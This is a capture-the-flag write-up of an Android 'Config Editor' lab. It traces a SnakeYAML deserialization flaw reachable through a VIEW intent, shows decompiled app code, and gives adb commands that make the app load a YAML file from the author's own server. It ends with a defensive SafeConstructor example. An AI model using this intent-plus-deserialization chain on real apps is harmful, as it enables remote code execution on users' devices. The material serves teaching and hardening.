Welcome to the Config Editor Challenge! In this lab, you’ll dive into a realistic situation involving vulnerabilities in a widely-used third-party library. Your objective is to exploit a library-induced vulnerability to achieve RCE on an Android application.
// Decompiled MainActivity.handleIntent(): handles the incoming VIEW intent
private final void handleIntent() {
    Intent intent = getIntent();
    String action = intent.getAction();
    Uri data = intent.getData();
    if (Intrinsics.areEqual("android.intent.action.VIEW", action) && data != null) {
        CopyUtil.INSTANCE.copyFileFromUri(data).observe(this, new MainActivity$sam$androidx_lifecycle_Observer$0(new Function1<Uri, Unit>() { // from class: com.mobilehackinglab.configeditor.MainActivity$handleIntent$1
            {
                super(1);
            }

            @Override // kotlin.jvm.functions.Function1
            public /* bridge */ /* synthetic */ Unit invoke(Uri uri) {
                invoke2(uri);
                return Unit.INSTANCE;
            }

            /* renamed from: invoke, reason: avoid collision after fix types in other method */
            public final void invoke2(Uri uri) {
                MainActivity mainActivity = MainActivity.this;
                Intrinsics.checkNotNull(uri);
                mainActivity.loadYaml(uri);
            }
        }));
    }
}
Moving on to the MainActivity code, there is a handleIntent function that receives the incoming intent and calls several functions, such as CopyUtil.INSTANCE.copyFileFromUri and loadYaml.
After looking into the imports, I noticed that the YAML handling uses SnakeYAML. I then googled it and found some useful information, such as this and this, showing that RCE is possible.
Another thing is that there is a class, LegacyCommandUtil, with a function that can execute commands. I believe this will be used together with the YAML deserialization in SnakeYAML. Time to perform dynamic analysis to see how it actually works.
PS C:\> adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "http://192.168.68.107:8001/test.yaml"
Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.68.107:8001/... cmp=com.mobilehackinglab.configeditor/.MainActivity }
From what I understand, this process basically just deserializes the file using yaml.load and serializes it back using yaml.dump. Based on this article, I tried the payload to see if it works.
PS C:\> adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "http://192.168.68.107:8001/test.yaml"
Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.68.107:8001/... cmp=com.mobilehackinglab.configeditor/.MainActivity }
It seems like something is wrong and the PoC provided did not work. I then tried to understand how the YAML deserialization works and what I could do with it. After understanding it, I noticed that it has something to do with classes, and LegacyCommandUtil has classes in it. I then crafted a payload to try to execute the LegacyCommandUtil function.
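The root cause behind the load-then-dump flow described above is SnakeYAML's default constructor, which resolves global tags (!!some.Class) to classes on the classpath and instantiates them during load(). The following is an added example, not the challenge app's code: it shows the same yaml.load / yaml.dump round trip written with SafeConstructor, which only builds plain YAML types and rejects any global tag before a class is touched. The class and method names are mine, the sample documents are constructed, and it assumes the SnakeYAML 2.x API (SafeConstructor takes a LoaderOptions argument).

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Hypothetical helper, not from the app: safe YAML round trip (load, then dump).
public class SafeYamlRoundTrip {

    // Unsafe: new Yaml() uses the full Constructor, which maps !!global tags to
    // arbitrary classes on the classpath and instantiates them in load().
    static Yaml unsafeLoader() {
        return new Yaml();
    }

    // Hardened: SafeConstructor only constructs standard YAML types (maps,
    // lists, scalars) and throws on any global tag it does not recognise.
    static Yaml safeLoader() {
        LoaderOptions opts = new LoaderOptions();     // SnakeYAML 2.x API (assumed)
        opts.setAllowDuplicateKeys(false);            // extra tightening, optional
        return new Yaml(new SafeConstructor(opts));
    }

    // Mirrors the app's behaviour as described in the write-up: deserialize
    // with load(), then serialize the resulting object graph back with dump().
    static String roundTrip(Yaml yaml, String text) {
        Object doc = yaml.load(text);
        return yaml.dump(doc);
    }

    public static void main(String[] args) {
        // Constructed sample config with no tags: the safe loader accepts it.
        String plain = "server:\n  port: 8080\n  debug: false\n";
        System.out.println(roundTrip(safeLoader(), plain));

        // Constructed document carrying a global tag. The tag names a harmless
        // JDK class on purpose; the point is that SafeConstructor refuses any
        // global tag instead of resolving it to a class.
        String tagged = "obj: !!java.lang.Object {}\n";
        try {
            roundTrip(safeLoader(), tagged);
            System.out.println("unexpected: tagged document was accepted");
        } catch (YAMLException e) {
            // ConstructorException is a YAMLException: "could not determine a
            // constructor for the tag ..."
            System.out.println("rejected by SafeConstructor: " + e.getMessage());
        }
    }
}
```

The check to run against an app like this one is therefore whether the Yaml instance is built with SafeConstructor (or a Constructor restricted by a TagInspector in SnakeYAML 2.x); a bare new Yaml() fed with attacker-controlled input from a VIEW intent is the condition that makes the class-tag trick above reachable.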